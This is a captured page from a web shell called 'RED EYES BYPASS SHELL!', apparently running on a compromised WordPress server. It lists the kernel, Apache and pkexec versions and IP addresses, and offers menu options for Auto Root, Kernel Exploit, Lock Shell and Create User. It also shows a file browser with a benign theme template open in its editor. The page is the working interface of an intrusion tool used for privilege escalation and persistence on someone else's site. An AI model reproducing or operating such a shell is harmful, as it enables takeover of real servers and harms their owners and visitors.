Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
bnm /
template-parts /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
author-bio.php
1.36
KB
-rwxr-xr-x
content-none.php
1.21
KB
-rwxr-xr-x
content-page.php
1.64
KB
-rwxr-xr-x
content-search.php
1.89
KB
-rwxr-xr-x
content-single.php
2.09
KB
-rwxr-xr-x
content.php
2.15
KB
-rwxr-xr-x
desktop-sidebar.php
591
B
-rwxr-xr-x
mobile-sidebar.php
875
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : author-bio.php
<?php /** * The template for displaying author info. * * @package BNM */ if ( false === get_theme_mod( 'bnm_show_author_bio', true ) ) { return; } $bnm_author_avatar = get_avatar( get_the_author_meta( 'ID' ), 80 ); ?> <div class="bnm-author-bio"> <?php if ( $bnm_author_avatar ) : ?> <div class="bnm-author-image"> <a href="<?php echo esc_url( get_author_posts_url( get_the_author_meta( 'ID' ) ) ); ?>" rel="author"> <?php // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped echo $bnm_author_avatar; ?> </a> </div> <?php endif; ?> <div class="bnm-author-content"> <div class="bnm-author-name"><a href="<?php echo esc_url( get_the_author_meta( 'ID' ) ); ?>" rel="author"><?php echo esc_html( get_the_author() );?></a></div> <div class="bnm-author-description"><?php echo wp_kses_post( wpautop( get_the_author_meta( 'description' ) ) ); ?></div> <a class="bnm-author-link" href="<?php echo esc_url( get_author_posts_url( get_the_author_meta( 'ID' ) ) ); ?>" rel="author"> <?php /* translators: %s is the current author's name. */ printf( esc_html__( 'More by %s', 'bnm' ), esc_html( get_the_author() ) ); ?> </a> </div> </div>
Close